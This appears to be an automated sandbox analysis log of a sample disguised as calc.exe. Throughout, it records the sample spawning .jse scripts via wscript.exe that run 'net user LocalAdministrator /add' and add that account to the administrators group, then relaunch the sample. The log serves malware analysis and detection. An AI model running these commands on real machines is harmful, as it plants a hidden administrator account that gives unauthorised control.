Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2932:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6256:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03

Source: C:\Users\user\Desktop\calc.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\calc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: calc.exe	String found in binary or memory: IWshShell3.Run("wscript.exe VAJOf7ymJQ.jse", "1", "false");IWshShell3.Run("wscript.exe R7pPYI1mUq.jse", "1", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");IWshShell3.Run("wscript.exe KobIITTimt.jse", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");IWshShell3.Run("wscript.exe BKnQ77VBHl.jse", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe	String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");

Source: C:\Users\user\Desktop\calc.exe

File read: C:\Users\user\Desktop\calc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" mumMT6WOaG.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fhZL0KwyiV.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" IDsLsRQlEe.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" cNs6XgJUw5.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" rbLiDVEIXX.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" UqWLwYRtxi.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iy4J2BVXGi.jse
Source: unknown	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" G0MZ6GMwly.jse
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nPYwCIjDlS.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fevGSHOMU4.jse
Source: C:\Windows\SysWOW64\net1.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net1.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net1.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" jkdKCpQjxW.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iTc0FWDklf.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Ssbk19MNG3.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" R7pPYI1mUq.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xJLmgXOpyA.jse
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
